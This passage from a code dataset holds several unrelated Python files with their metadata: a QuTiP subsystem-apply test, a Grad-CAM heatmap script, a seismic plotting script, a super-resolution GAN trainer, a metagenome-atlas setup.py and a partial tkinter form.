PARTICULAR PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT\n# HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\n# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT\n# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,\n# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY\n# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n###############################################################################\n\nfrom numpy.linalg import norm\nfrom numpy.testing import assert_, run_module_suite\n\nfrom qutip.random_objects import rand_dm, rand_unitary, rand_kraus_map\nfrom qutip.subsystem_apply import subsystem_apply\nfrom qutip.superop_reps import kraus_to_super\nfrom qutip.superoperator import mat2vec, vec2mat\nfrom qutip.tensor import tensor\nfrom qutip.qobj import Qobj\n\n\nclass TestSubsysApply(object):\n \"\"\"\n A test class for the QuTiP function for applying superoperators to\n subsystems.\n The four tests below determine whether efficient numerics, naive numerics\n and semi-analytic results are identical.\n \"\"\"\n\n def test_SimpleSingleApply(self):\n \"\"\"\n Non-composite system, operator on Hilbert space.\n \"\"\"\n rho_3 = rand_dm(3)\n single_op = rand_unitary(3)\n analytic_result = single_op * rho_3 * single_op.dag()\n naive_result = subsystem_apply(rho_3, single_op, [True],\n reference=True)\n efficient_result = subsystem_apply(rho_3, single_op, [True])\n naive_diff = (analytic_result - naive_result).data.todense()\n efficient_diff = (efficient_result - analytic_result).data.todense()\n assert_(norm(naive_diff) < 1e-12 and norm(efficient_diff) < 1e-12)\n\n def test_SimpleSuperApply(self):\n \"\"\"\n Non-composite system, operator on Liouville space.\n \"\"\"\n rho_3 = rand_dm(3)\n superop = kraus_to_super(rand_kraus_map(3))\n analytic_result = vec2mat(superop.data.todense() *\n mat2vec(rho_3.data.todense()))\n\n naive_result = subsystem_apply(rho_3, superop, [True],\n reference=True)\n naive_diff = (analytic_result - naive_result).data.todense()\n assert_(norm(naive_diff) < 1e-12)\n\n efficient_result = subsystem_apply(rho_3, superop, [True])\n efficient_diff = (efficient_result - analytic_result).data.todense()\n assert_(norm(efficient_diff) < 1e-12)\n\n def test_ComplexSingleApply(self):\n \"\"\"\n Composite system, operator on Hilbert space.\n \"\"\"\n rho_list = list(map(rand_dm, [2, 3, 2, 3, 2]))\n rho_input = tensor(rho_list)\n single_op = rand_unitary(3)\n\n analytic_result = rho_list\n analytic_result[1] = single_op * analytic_result[1] * single_op.dag()\n analytic_result[3] = single_op * analytic_result[3] * single_op.dag()\n analytic_result = tensor(analytic_result)\n\n naive_result = subsystem_apply(rho_input, single_op,\n [False, True, False, True, False],\n reference=True)\n naive_diff = (analytic_result - naive_result).data.todense()\n assert_(norm(naive_diff) < 1e-12)\n\n efficient_result = subsystem_apply(rho_input, single_op,\n [False, True, False, True, False])\n efficient_diff = (efficient_result - analytic_result).data.todense()\n assert_(norm(efficient_diff) < 1e-12)\n\n def test_ComplexSuperApply(self):\n \"\"\"\n Superoperator: Efficient numerics and reference return same result,\n acting on non-composite system\n \"\"\"\n rho_list = list(map(rand_dm, [2, 3, 2, 3, 2]))\n rho_input = tensor(rho_list)\n superop = kraus_to_super(rand_kraus_map(3))\n\n 
analytic_result = rho_list\n        analytic_result[1] = Qobj(vec2mat(superop.data.todense() *\n                          mat2vec(analytic_result[1].data.todense())))\n        analytic_result[3] = Qobj(vec2mat(superop.data.todense() *\n                          mat2vec(analytic_result[3].data.todense())))\n        analytic_result = tensor(analytic_result)\n\n        naive_result = subsystem_apply(rho_input, superop,\n                                       [False, True, False, True, False],\n                                       reference=True)\n        naive_diff = (analytic_result - naive_result).data.todense()\n        assert_(norm(naive_diff) < 1e-12)\n\n        efficient_result = subsystem_apply(rho_input, superop,\n                                           [False, True, False, True, False])\n        efficient_diff = (efficient_result - analytic_result).data.todense()\n        assert_(norm(efficient_diff) < 1e-12)\n\n\nif __name__ == \"__main__\":\n    run_module_suite()\n","sub_path":"qutip/tests/test_subsys_apply.py","file_name":"test_subsys_apply.py","file_ext":"py","file_size_in_byte":6207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
{"seq_id":"123307009","text":"import matplotlib.pyplot as plt\nfrom tensorflow.keras import backend as K\nfrom tensorflow.keras.preprocessing import image\nfrom tensorflow.keras.applications.vgg16 import VGG16, preprocess_input, decode_predictions\nimport numpy as np\nimport cv2\n\nimg_path = 'save/wiki_cat1.jpg'\nimg = image.load_img(img_path, target_size=(224, 224))\nx = image.img_to_array(img)\nx = np.expand_dims(x, axis=0)\n\nx = preprocess_input(x)\n\nmodel = VGG16(weights='imagenet')\n\npreds = model.predict(x)\nprint('Predicted:', decode_predictions(preds, top=3))\n\nlast_conv_layer = model.get_layer('block5_conv3')\ncat_output = model.output[:,386]\ngrads = K.gradients(cat_output, last_conv_layer.output)[0]\n\npooled_grads = K.mean(grads, axis=(0,1,2))\n\niterate = K.function([model.input], [pooled_grads, last_conv_layer.output[0]])\n\npooled_grads_value, conv_layer_value = iterate([x])\n\n# weight each of the 512 feature-map channels by its pooled gradient (Grad-CAM)\nfor i in range(512):\n    conv_layer_value[:, :, i] *= pooled_grads_value[i]\n\nheatmap = np.mean(conv_layer_value, axis=-1)\nheatmap = np.maximum(heatmap, 0)\nheatmap /= np.max(heatmap)\n# plt.matshow(heatmap)\n# plt.show()\n\nimg = cv2.imread(img_path)\nheatmap = cv2.resize(heatmap, (img.shape[1], img.shape[0]))\nheatmap = np.uint8(255 * heatmap)\nheatmap = cv2.applyColorMap(heatmap, cv2.COLORMAP_JET)\nsuperimposed_img = heatmap * 0.4 + img\ncv2.imwrite('output/vgg_heatmap1.png', superimposed_img)\n\n","sub_path":"chap5/heatmap.py","file_name":"heatmap.py","file_ext":"py","file_size_in_byte":1421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
{"seq_id":"214107700","text":"'''\nCreated on Apr 30, 2012\n\n@author: Sean Ross-Ross, Matt Hall, Evan Bianco\n'''\nimport numpy as np\nimport matplotlib\n\nimport matplotlib.pyplot as plt\n\nfrom argparse import ArgumentParser\n\nfrom modelr.web.urlargparse import rock_properties_type\n\nfrom modelr.web.util import multi_plot\n\nimport modelr.modelbuilder as mb\nfrom modelr.web.defaults import default_parsers\nfrom svgwrite import rgb\n\nshort_description = ('Look at plots '\n                     'across spatial, offset, and frequency '\n                     'cross-sections')\n\n\ndef add_arguments(parser):\n\n    default_parser_list = [\n                         'title',\n                         'colourmap',\n                         'wiggle_skips',\n                         'aspect_ratio',\n                         'base1','base2','overlay1','overlay2',\n                         'opacity'\n                         ]\n    \n    default_parsers(parser,default_parser_list)\n\n    parser.add_argument('f',\n                        type=float,\n                        default=10.0,\n                        help=\"Wavelet CF to use for cross section\")\n\n    
parser.add_argument('theta',\n type=float,\n default=20.0,\n help=\"Offset angle to use for cross section\")\n \n parser.add_argument('slice',\n type=str,\n help='Slice to return',\n default='spatial',\n choices=['spatial', 'angle', 'frequency']\n )\n \n parser.add_argument('trace',\n type=int,\n help='Trace to use for non-spatial cross section',\n default=150\n )\n \n parser.add_argument('tslice',\n type=float, \n help='time [s] along which to plot instantaneous amplitude ',\n required=True,\n default=0.050\n )\n\n return parser\n\ndef run_script(earth_model, seismic_model, plot_args):\n\n # Get the axis\n traces = range(seismic_model.seismic.shape[1])\n f = seismic_model.wavelet_cf()\n theta = seismic_model.offset_angles()\n plot_args.xscale = seismic_model.f_res\n\n \n return multi_plot(earth_model.get_data(),\n seismic_model.reflectivity,\n seismic_model.seismic, traces, f, theta,\n plot_args)\n \n \n\n \nif __name__ == '__main__':\n main()\n","sub_path":"modelr/web/scripts/plots/modelr_plot.py","file_name":"modelr_plot.py","file_ext":"py","file_size_in_byte":2558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"312334373","text":"'''\nCreated on Apr 18, 2019\n\n@author: gjpicker\n'''\n# -*- coding: utf-8 -*- \nfrom __future__ import absolute_import \nfrom collections import OrderedDict\n# from . import model as model \n\nimport model2 as model \n\nimport torch \nimport torch.nn as nn \n#import torch.optim as optim\nimport torch.optim\nfrom torch.optim import lr_scheduler\n\nimport itertools\n\nimport time \nimport math \nimport tqdm\n\nimport numpy as np \n\nfrom networks import *\n#=====START: ADDED FOR DISTRIBUTED======\nfrom distributed import init_distributed, apply_gradient_allreduce, reduce_tensor\nfrom torch.utils.data.distributed import DistributedSampler\n#=====END: ADDED FOR DISTRIBUTED======\n\nimport torch.nn.functional as F \n\nimport torch.utils.data as t_data\n\nfrom utils.visualizer import Visualizer\nimport utils.util as util\n\n#from utils import image_quality\nfrom utils import calculate_PSNR_SSIM as image_quality\nimport utils.common as common \n\n\nclass Treainer(object):\n '''\n loss_1 pixel \n loss_2 vgg_f \n loss_3 g_loss [fake]\n g_vgg_loss \n loss_4 d_loss [fake,true]\n d_vgg_loss \n '''\n def __init__(self,opt=None,train_dt =None,train_dt_warm=None,dis_list=[] , val_dt_warm=None):\n self.device =torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n self.opt = opt \n\n self.visualizer = Visualizer(opt)\n\n num_gpus = torch.cuda.device_count()\n #dis_list[1]\n self.rank =dis_list[0]\n\n #=====START: ADDED FOR DISTRIBUTED======\n if num_gpus > 1:\n #init_distributed(rank, num_gpus, group_name, **dist_config)\n dist_config= dis_list[3]\n init_distributed(dis_list[0], dis_list[1], dis_list[2], **dist_config)\n #=====END: ADDED FOR DISTRIBUTED======\n\n\n if opt.ge_net ==\"srfeat\":\n raise Exception(\"not support multi-scale\")\n# self.netG= model.G() \n elif opt.ge_net ==\"carn\":\n self.netG= model.G1()\n elif opt.ge_net ==\"carnm\":\n self.netG= model.G2()\n else :\n raise Exception(\"unknow \")\n \n \n dis_net_str = opt.dis_net if hasattr(opt,\"dis_net\") else \"nlayer\"\n if dis_net_str==\"fc\":\n self.netD = model.D()\n# self.netD_vgg= model. D(input_c=512,input_width=18) \n elif dis_net_str==\"nlayer\":\n self.netD = model.NLayerDiscriminator(input_nc=3)\n# self.netD_vgg= model. 
PixelDiscriminator(input_nc=512) \n \n \n if opt.vgg_type ==\"style\":\n self.vgg = load_vgg16(opt.vgg_model_path + '/models')\n elif opt.vgg_type ==\"classify\" :\n self.vgg = model. vgg19_withoutbn_customefinetune()\n \n self.vgg.eval()\n for param in self.vgg.parameters():\n param.requires_grad = False\n\n# for p in self.vgg.parameters():\n# p.requires_grad = False\n\n\n init_weights(self.netD,init_type=opt.init)\n init_weights(self.netG,init_type=opt.init)\n \n self.vgg= self.vgg.to(self.device)\n self.netD= self.netD.to(self.device)\n# self.netD_vgg= self.netD_vgg.to(self.device)\n self.netG= self.netG.to(self.device)\n\n print (\"======\"*8)\n print (self.vgg)\n print (\"======\"*8)\n print (self.netD)\n# print (\"======\"*8)\n# print (self.netD_vgg)\n print (\"======\"*8)\n print (self.netG)\n\n #=====START: ADDED FOR DISTRIBUTED======\n if num_gpus > 1:\n #self.vgg = apply_gradient_allreduce(self.vgg)\n# self.netD_vgg = apply_gradient_allreduce(self.netD_vgg)\n self.netD = apply_gradient_allreduce(self.netD)\n self.netG = apply_gradient_allreduce(self.netG)\n \n #=====END: ADDED FOR DISTRIBUTED======\n\n\n self.optim_G= torch. optim.Adam(filter(lambda p: p.requires_grad, self.netG.parameters()),\\\n lr=opt.warm_opt.lr, betas=opt.warm_opt.betas, weight_decay=0.0)\n \n \n if opt.dis.optim ==\"sgd\":\n self.optim_D= torch.optim.SGD( filter(lambda p: p.requires_grad, \\\n itertools.chain(self.netD.parameters() ) ),\\\n lr=opt.dis.lr,\n )\n elif opt.dis.optim ==\"adam\":\n self.optim_D= torch.optim.Adam( filter(lambda p: p.requires_grad, \\\n itertools.chain(self.netD.parameters() ) ),\\\n lr=opt.dis.lr,betas=opt.dis.betas, weight_decay=0.0\n )\n else:\n raise Exception(\"unknown\")\n \n \n \n print (\"create schedule \")\n \n lr_sc_G = get_scheduler(self.optim_G,opt.gen )\n lr_sc_D = get_scheduler(self.optim_D,opt.dis )\n self.schedulers = []\n self.schedulers.append(lr_sc_G)\n self.schedulers.append(lr_sc_D)\n \n \n # =====START: ADDED FOR DISTRIBUTED======\n train_dt = torch.utils.data.ConcatDataset([train_dt])\n\n train_sampler = DistributedSampler(train_dt) if num_gpus > 1 else None\n val_sampler_warm = DistributedSampler(val_dt_warm) if num_gpus > 1 else None\n # =====END: ADDED FOR DISTRIBUTED======\n\n kw ={\"pin_memory\":True , \"num_workers\":8 } if torch.cuda.is_available() else {}\n dl_c =t_data.DataLoader(train_dt ,batch_size=opt.batch_size,\\\n sampler=train_sampler , drop_last=True, **kw )\n \n\n dl_val_warm =t_data.DataLoader(val_dt_warm ,batch_size=1, \n sampler=val_sampler_warm , drop_last=True ,**kw)\n\n\n\n self.dt_train = dl_c\n self.dt_val_warm = dl_val_warm\n\n\n if opt.warm_opt.loss_fn==\"mse\":\n self.critic_pixel = torch.nn.MSELoss()\n elif opt.warm_opt.loss_fn==\"l1\":\n self.critic_pixel = torch.nn.L1Loss()\n elif opt.warm_opt.loss_fn==\"smooth_l1\":\n self.critic_pixel = torch.nn.SmoothL1Loss()\n else:\n raise Exception(\"unknown\")\n\n self.critic_pixel=self.critic_pixel.to(self.device)\n \n self.gan_loss = GANLoss(gan_mode=opt.gan_loss_fn).to(self.device)\n print (\"init ....\")\n \n\n self.save_dir = os.path.dirname( self.visualizer. 
log_name )\n\n \n\n def _validate_(self):\n with torch.no_grad():\n print (\"val ,\"*8,\"warm start...\",len(self.dt_val_warm))\n iter_start_time = time.time()\n ssim = []\n batch_loss = []\n psnr = []\n\n save_image_list_1 = []\n\n lr_list = []\n hr_list = []\n sr_list = []\n img_list= [] \n \n for ii,data in tqdm.tqdm( enumerate(self.dt_val_warm) ):\n if type(data)== dict :\n input_lr ,input_hr = data[\"LR\"] ,data[\"HR\"]\n #cubic_hr = F.upsample(input_lr, scale_factor=4 , mode = \"trilinear\")\n else : \n if len(data)>3:\n input_lr ,input_hr , cubic_hr,_,_ =data\n else :\n input_lr ,input_hr , cubic_hr =data\n\n assert input_lr.size(0)==1 ,\"batchsize is 1 \"\n self. input_lr = input_lr .to(self.device)\n self. input_hr = input_hr .to(self.device)\n\n self.forward()\n\n self.input_lr=F.upsample(self.input_lr,scale_factor=4)\n \n self.output_hr = common.Tensor2np(self.output_hr.mul_(255.).detach().cpu().squeeze_(0))\n self.input_hr = common.Tensor2np(self.input_hr.mul_(255.).detach().cpu().squeeze_(0))\n self.input_lr = common.Tensor2np(self.input_lr.mul_(255.).detach().cpu().squeeze_(0))\n \n\n sr_list.append(self.output_hr)\n hr_list.append(self.input_hr)\n\n img_list .append(np.concatenate([self.input_lr,self.output_hr,self.input_hr],axis=0) )\n\n data_ssim,data_psnr = image_quality .go_calc(list(zip(sr_list,hr_list)) ,False) \n \n \n for i,img_item in enumerate(img_list):\n save_image_list = OrderedDict([\n (\"lr_sr_hr\", img_item ),\n ] ) \n self.visualizer.display_current_results(save_image_list,self.epoch, save_result=True, offset=20+i,title=\"val_imag\")\n\n #val_info = (np.mean(ssim),np.mean(psnr) )\n val_info = (data_ssim,data_psnr )\n errors = dict(zip ( (\"ssim\",\"psnr\") , val_info ) ) \n t = (time.time() - iter_start_time) \n self.visualizer.print_current_errors(self.epoch , self.epoch, errors, t,log_name=\"loss_log_val.txt\")\n self.visualizer.plot_current_errors(self.epoch , self.epoch,opt=None,errors=errors,display_id_offset=3,loss_name=\"val\")\n\n return val_info\n\n\n def run(self):\n self.load_networks()\n self._run_train()\n\n\n def _run_train(self):\n print (\"train.i...\"*8)\n total_steps=0\n opt= self.opt\n\n self.model_names = [\"G\",\"D\"]\n\n self.loss_w_g=torch.tensor(0)\n dataset_size= len(self.dt_train) * opt.batch_size \n best_loss = 10e5\n\n for epoch in range(0 , self.opt.epoches_warm +self.opt.epoches):\n self.epoch = epoch\n# epoch_start_time = time.time()\n epoch_iter = 0\n\n val_loss = self._validate_()\n val_loss = val_loss[0]\n if best_loss > val_loss:\n best_loss= val_loss\n self.save_networks(\"best\")\n self.save_networks(epoch)\n\n\n for data in self.dt_train :\n\n\n scale=4\n if True :\n hr_2,input_lr_2 ,hr_3,input_lr_3,hr_4,input_lr =data[0][0],data[0][1], data[1][0],data[1][1], data[2][0],data[2][1] \n scale = np.random.choice([2,3,4])\n self. input_cubic_hr = hr_4.clone()\n\n if scale==3 :\n input_hr= hr_3\n self. input_lr = input_lr_3 .to(self.device)\n #self. input_hr = input_hr[:,:,1:-1,1:-1] .to(self.device)\n self. input_hr = hr_3.to(self.device)#input_hr[:,:,1:-1,1:-1] .to(self.device)\n elif scale==2 :\n self. input_lr = input_lr_2 .to(self.device)\n self.input_hr = hr_2.to(self.device)\n else:\n self. 
input_lr = input_lr .to(self.device)\n self.input_hr = hr_4.to(self.device)\n \n \n\n iter_start_time = time.time()\n\n self.forward(scale=scale)\n\n self.optim_G .zero_grad ()\n self.g_loss()\n self.optim_G.step()\n\n\n self.optim_D .zero_grad ()\n self.d_loss()\n self.optim_D.step()\n\n\n self.visualizer.reset()\n total_steps += opt.batch_size\n epoch_iter += opt.batch_size\n\n if total_steps % opt.display_freq == 0:\n save_result = total_steps % opt.update_html_freq == 0\n self.visualizer.display_current_results(self.get_current_visuals(), epoch, save_result)\n\n if total_steps % opt.print_freq == 0:\n errors = self.get_current_errors()\n t = (time.time() - iter_start_time) / opt.batch_size\n self.visualizer.print_current_errors(epoch , epoch_iter, errors, t)\n if opt.display_id > 0:\n self.visualizer.plot_current_errors(epoch, float(epoch_iter)/dataset_size , opt, errors)\n\n\n if self.rank !=0 :\n continue\n lr_g,lr_d=self.update_learning_rate(is_warm=False)\n self.visualizer.plot_current_lrs(epoch,0,opt=None,\\\n errors=OrderedDict([ ('lr_warm_g',0),(\"lr_g\",lr_g),(\"lr_d\",lr_d) ]) , loss_name=\"lr_warm\" ,display_id_offset=1)\n\n \n \n def forward(self,scale=4):\n self.output_hr = self.netG(self.input_lr,scale=scale)\n# self.input_hr \n pass \n \n \n \n def g_loss (self,):\n #print (self.opt.gen,type(self.opt.gen),self.opt.gen.keys())\n vgg_r = self.opt.gen.lambda_vgg_input\n #g feature f \n x_f_fake= self.vgg(vgg_r * self.output_hr) \n# x_f_real= self.vgg(vgg_r * self.input_hr) \n x_f_real= self.vgg(vgg_r * self.input_hr) \n \n #g .. f \n d_fake = self.netD(self.output_hr)\n self.loss_G_g = self.opt.gen.lambda_vgg_loss * self.gan_loss (d_fake,True )\n\n self.loss_G_fg = 0 \n# fd_fake = self.netD_vgg(x_f_fake)\n# self.loss_G_fg = self.opt.gen.lambda_vgg_loss * self.gan_loss (fd_fake,True )\n\n ## perception \n self.loss_G_p = self.critic_pixel (x_f_fake,x_f_real )\n\n\n self.loss_w_g = self.opt.warm_opt.lambda_warm_loss* self.critic_pixel(self.output_hr , self.input_hr )\n\n self.loss_g = self.loss_G_g + self.loss_G_fg + self.loss_G_p \n\n self.loss_g.backward()\n \n if hasattr(self.opt.warm_opt, \"clip\"):\n nn.utils.clip_grad_norm(self.netG.parameters(), self.opt.warm_opt.clip)\n \n def d_loss (self,):\n d_fake = self.netD(self.output_hr.detach())\n d_real = self.netD(self.input_hr)\n \n \n self.loss_D_f = self.gan_loss (d_fake,False )\n self.loss_D_r = self.gan_loss (d_real,True )\n \n if self.opt.gan_loss_fn ==\"wgangp\":\n\n gradient_penalty,_ = cal_gradient_penalty(netD=self.netD, real_data=self.input_hr.data, \\\n fake_data = self.output_hr.data, device=self.device)\n gradient_penalty.backward()\n\n loss_d =self.loss_D_f+ self.loss_D_r \n loss_d.backward()\n \n def get_current_errors(self):\n return OrderedDict([('G_p', self.loss_G_p.item() if hasattr(self,\"loss_G_p\") else 0 ),\n ('G_g', self.loss_G_g.item() if hasattr(self,\"loss_G_g\") else 0 ),\n ('D_real', self.loss_D_r.item() if hasattr(self,\"loss_D_r\") else 0 ) ,\n ('D_fake', self.loss_D_f.item() if hasattr(self,\"loss_D_f\") else 0 ),\n ('warm_p', self.loss_w_g.item() if hasattr(self,\"loss_w_g\") else 0 ),\n ])\n\n def get_current_visuals(self):\n def mmsize(v,size):\n if v.shape[0]!=size:\n dl = (v.shape[0]-size)//2\n return v[dl:-dl,dl:-dl,:] \n return v\n input_lr=F.upsample(self.input_lr,scale_factor=self.input_hr.size(-1)//self.input_lr.size(-1) )\n\n input =mmsize( util.tensor2im( input_lr ) ,self.input_hr.size(-1) )\n target =mmsize( util.tensor2im(self.input_hr) ,self.input_hr.size(-1) )\n fake =mmsize( 
util.tensor2im(self.output_hr.detach() ) , self.input_hr.size(-1) )\n #mmz = min([input.shape[0] ,target.shape[0],fake.shape[0] ] )\n \n return OrderedDict([('input', input), ('fake', fake), ('target', target)])\n\n def update_learning_rate(self,is_warm =True ):\n if True:\n for scheduler in self.schedulers:\n scheduler.step()\n\n lr_g = self.optim_G.param_groups[0]['lr']\n lr_d = self.optim_D.param_groups[0]['lr']\n return (lr_g,lr_d)\n \n def save_networks(self, epoch):\n \"\"\"Save all the networks to the disk.\n Parameters:\n epoch (int) -- current epoch; used in the file name '%s_net_%s.pth' % (epoch, name)\n \"\"\"\n for name in self.model_names:\n if isinstance(name, str):\n save_filename = '%s_net_%s.pth' % (epoch, name)\n save_path = os.path.join(self.save_dir, save_filename)\n net = getattr(self, 'net' + name)\n\n if \"parallel\" in str(type(net)) and torch.cuda.is_available():\n torch.save(net.module.cpu().state_dict(), save_path)\n net.cuda(self.gpu_ids[0])\n else:\n torch.save(net.cpu().state_dict(), save_path)\n\n net.to(self.device)\n\n\n\n def load_networks(self, epoch=None):\n \"\"\"Load all the networks from the disk.\n Parameters:\n epoch (int) -- current epoch; used in the file name '%s_net_%s.pth' % (epoch, name)\n \"\"\"\n pth_list= [os.path.basename(x) for x in os.listdir(self.save_dir)]\n pth_list= [x.split(\"_\")[0] for x in pth_list if \"_net\" in x and \".pth\" in x and \"best\" not in x ]\n pth_list=sorted(pth_list)[:-1]\n pth_list=list( map(int, pth_list))\n pth_list=sorted(pth_list)\n current_epoch = 0 \n try:\n current_epoch= int(pth_list[-1])\n except :\n pass\n\n if current_epoch<=0 :\n return current_epoch\n\n epoch = current_epoch\n #for name in self.model_names:\n for name in [\"G\",\"D\"]:\n if isinstance(name, str):\n load_filename = '%s_net_%s.pth' % (epoch, name)\n load_path = os.path.join(self.save_dir, load_filename)\n if not os.path.isfile(load_path):\n print (\"***\",\"fail find%s\"%(load_path))\n continue\n net = getattr(self, 'net' + name)\n if isinstance(net, torch.nn.DataParallel):\n net = net.module\n print('loading the model from %s' % load_path)\n # if you are using PyTorch newer than 0.4 (e.g., built from\n # GitHub source), you can remove str() on self.device\n state_dict = torch.load(load_path, map_location=str(self.device))\n if hasattr(state_dict, '_metadata'):\n del state_dict._metadata\n\n # patch InstanceNorm checkpoints prior to 0.4\n #for key in list(state_dict.keys()): # need to copy keys here because we mutate in loop\n # self.__patch_instance_norm_state_dict(state_dict, net, key.split('.'))\n net.load_state_dict(state_dict)\n\n \n return current_epoch\n","sub_path":"sr_seaf/trainer_3.py","file_name":"trainer_3.py","file_ext":"py","file_size_in_byte":18269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"183382335","text":"import io\nfrom os.path import dirname, join\nfrom setuptools import setup\n\n\n# read the contents of your README file\nfrom os import path\nthis_directory = path.abspath(path.dirname(__file__))\nwith open(path.join(this_directory, 'README.md'), encoding='utf-8') as f:\n long_description = f.read()\n\n\ndef get_version(relpath):\n \"\"\"Read version info from a file without importing it\"\"\"\n for line in io.open(join(dirname(__file__), relpath), encoding=\"cp437\"):\n if \"__version__\" in line:\n if '\"' in line:\n # __version__ = \"0.9\"\n return line.split('\"')[1]\n elif \"'\" in line:\n return line.split(\"'\")[1]\n\n\nsetup(\n 
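The save_networks/load_networks pair above serializes the underlying module when the net is wrapped in DataParallel (detected there via "parallel" in str(type(net))) and remaps storages with map_location on load. A condensed standalone sketch of that checkpoint round trip, with a toy module and a /tmp path standing in for the real save_dir:

# Sketch of the DataParallel-aware checkpoint round trip used above.
import os
import torch
import torch.nn as nn

net = nn.Linear(4, 2)                      # toy stand-in for netG/netD
save_path = os.path.join("/tmp", "1_net_G.pth")

# Save: always serialize the inner module's state_dict, not the wrapper's.
module = net.module if isinstance(net, nn.DataParallel) else net
torch.save(module.state_dict(), save_path)

# Load: map storages onto the target device, then restore in place.
state_dict = torch.load(save_path, map_location="cpu")
module.load_state_dict(state_dict)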
name='metagenome-atlas',\n version=get_version(\"atlas/__init__.py\"),\n url='https://github.com/metagenome-atlas/atlas',\n license='BSD-3',\n author='Joe Brown, Silas Kieser',\n author_email='brwnjm@gmail.com, silas.kieser@gmail.com',\n description='ATLAS - workflows for assembly, annotation, and genomic binning of metagenomic and metatranscriptomic data.',\n long_description=long_description,\n long_description_content_type='text/markdown',\n packages=['atlas'],\n package_data={'': [\n \"atlas/Snakefile\",\n \"atlas/template_config.yaml\",\n \"atlas/rules/annotate.snakefile\",\n \"atlas/rules/assemble.snakefile\",\n \"atlas/rules/binning.snakefile\",\n \"atlas/rules/download.snakefile\",\n \"atlas/rules/gene_annotation.snakefile\",\n \"atlas/rules/genecatalog.snakefile\",\n \"atlas/rules/get_fasta_of_bins.py\",\n \"atlas/rules/initialize_checkm.py\",\n \"atlas/rules/qc.snakefile\",\n \"atlas/rules/scg_blank_diamond.rb\",\n \"atlas/envs/DASTool.yaml\",\n \"atlas/envs/canopy.yaml\",\n \"atlas/envs/cd-hit.yaml\",\n \"atlas/envs/checkm.yaml\",\n \"atlas/envs/concoct.yaml\",\n \"atlas/envs/dRep.yaml\",\n \"atlas/envs/eggNOG.yaml\",\n \"atlas/envs/maxbin.yaml\",\n \"atlas/envs/metabat.yaml\",\n \"atlas/envs/mmseqs.yaml\",\n \"atlas/envs/optional_genome_binning.yaml\",\n \"atlas/envs/prokka.yaml\",\n \"atlas/envs/report.yaml\",\n \"atlas/envs/required_packages.yaml\",\n \"atlas/envs/sequence_utils.yaml\",\n \"atlas/template_config.yaml\",\n \"atlas/report/qc_report.py\",\n \"atlas/report/report.css\",\n \"atlas/report/assembly_report.py\",\n \"atlas/report/bin_report.py\",\n \"scripts/utils/fasta.py\",\n \"scripts/utils/parsers_bbmap.py\",\n \"scripts/utils/__init__.py\"\n ]},\n include_package_data=True,\n # install via conda: click, pandas, pyyaml, snakemake\n install_requires=[\n 'ruamel.yaml==0.15.35'\n ],\n entry_points={\n 'console_scripts': [\n 'atlas = atlas.atlas:cli'\n ]\n },\n classifiers=[\"Topic :: Scientific/Engineering :: Bio-Informatics\"],\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"185249235","text":"import tkinter as tk\r\nfrom functools import partial\r\nimport family\r\nimport os\r\nfrom center_window import *\r\n\r\n\r\nclass RegisterFamily:\r\n def __init__(self, master):\r\n self.master = master\r\n self.master.geometry('250x215')\r\n center(self.master)\r\n self.frame = tk.Frame(self.master)\r\n self.frame.grid(row=0, column=0)\r\n self.frame.grid_rowconfigure([0, 1, 2], minsize=40)\r\n self.frame.grid_columnconfigure([0, 1, 2], minsize=65)\r\n\r\n self.famName = tk.StringVar()\r\n self.famNum = tk.StringVar()\r\n self.famNameLbl = tk.Label(self.frame, text=\"Family Name: \").grid(row=0, column=0)\r\n self.famNameNtr = tk.Entry(self.frame, textvariable=self.famName).grid(row=0, column=1)\r\n self.numPplLbl = tk.Label(self.frame, text=\"Number of People: \").grid(row=1, column=0)\r\n self.numPplNtr = tk.Entry(self.frame, textvariable=self.famNum).grid(row=1, column=1)\r\n\r\n self.enterNames = tk.Button(self.frame, text=\"Enter Names: \", command=self.__name_frame).grid(row=2, column=1)\r\n\r\n def __name_frame(self):\r\n for i in self.famNum.get():\r\n if not(48 <= ord(i) <= 57):\r\n self.alertLbl = tk.Label(self.frame, text=\"Number of People must be an Integer Value\").grid(row=5, column=0, columnspan=3)\r\n return\r\n if os.path.isfile(f\"{self.famName.get()}\"):\r\n self.alertLbl = tk.Label(self.frame, text=\"Family 
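One note on the setup.py record above: the entry_points block ('atlas = atlas.atlas:cli') is what makes pip generate an atlas executable that imports atlas.atlas and calls cli(). A hypothetical minimal target for such an entry point; module and command names here are illustrative, not from the record:

# Hypothetical mypkg/cli.py, the callable behind a console_scripts entry
# such as 'mycmd = mypkg.cli:main' in setup().
import sys

def main():
    # The pip-generated 'mycmd' wrapper imports this module and calls main().
    print("mycmd called with:", sys.argv[1:])
    return 0

if __name__ == "__main__":
    sys.exit(main())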
